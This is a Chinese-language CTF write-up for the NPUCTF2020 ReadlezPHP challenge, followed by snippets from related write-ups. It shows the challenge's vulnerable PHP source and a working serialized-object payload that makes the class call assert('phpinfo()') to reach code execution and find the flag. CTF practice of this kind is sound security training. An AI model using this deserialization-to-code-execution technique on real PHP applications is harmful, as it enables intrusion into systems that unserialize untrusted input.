[NPUCTF2020]ReadlezPHP（反序列化）

题目

源代码发现跳转time.php?souce=，进去后显示源码

<?php
#error_reporting(0);
class HelloPhp
{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a; $b = $this->b; echo $b($a); }
}
$c = new HelloPhp; if(isset($_GET['source']))
{ highlight_file(__FILE__); die(0);
} @$ppp = unserialize($_GET["data"]);

简单查看到反序列化,构造序列化字符传入,这里我们用断言assert()函数来读phpinfo phpinfo怎么来的？看wp才知道的

?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

看到phpinfo后直接查找flag字样就能看到

[NPUCTF2020]ReadlezPHP（反序列化）相关推荐

[NPUCTF2020]ReadlezPHP与assert函数利用
在URL前添加view-source:即可查看源码点击/time.php?source跳转如下页面创建一个HelloPhp类和两个变量$a和$b,将a初始赋值"Y-m-d h:i:s& ...
BUU_刷题之旅(One)
前言: 水平不够,刷题来凑! [NPUCTF2020]ReadlezPHP --反序列化.disable_functions的绕过.flag隐藏在phpinfo中开始以为这一堆0101有什么线索,看 ...
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
0x01什么是PHP序列化与反序列化 PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构. 比方来说, ...
CTF-PHP反序列化漏洞2-利用魔法函数
作者:Eason_LYC 悲观者预言失败,十言九中. 乐观者创造奇迹,一次即可. 一个人的价值,在于他所拥有的.可以不学无术,但不能一无所有! 技术领域:WEB安全.网络攻防关注WEB安全.网络攻防 ...
序列化和反序列化刷题记录
BUU CODE REVIEW\ *反序列化 md5 <?php /*** Created by PhpStorm.* User: jinzhao* Date: 2019/10/6* Time: ...
BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
BUUCTF刷题记录(7)
文章目录 web [NPUCTF2020]ezinclude [NPUCTF2020]ReadlezPHP [GXYCTF2019]BabysqliV3.0 非预期1 非预期2 预期 [NCTF201 ...
BUU WEB刷题记录1（持续更新）
[MRCTF2020]你传你马呢打开得到一张晦气的图片和文件上传点尝试直接上传PHP文件失败(意料之中),随便上传了一张png图片,发现可以,将png文件内容改写成一句话木马<?php @e ...
刷题记录-NPUCTF2020(web部分)
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可打开链接/time.php?source 很明显,p ...

[NPUCTF2020]ReadlezPHP（反序列化）

题目

[NPUCTF2020]ReadlezPHP（反序列化）相关推荐

最新文章

热门文章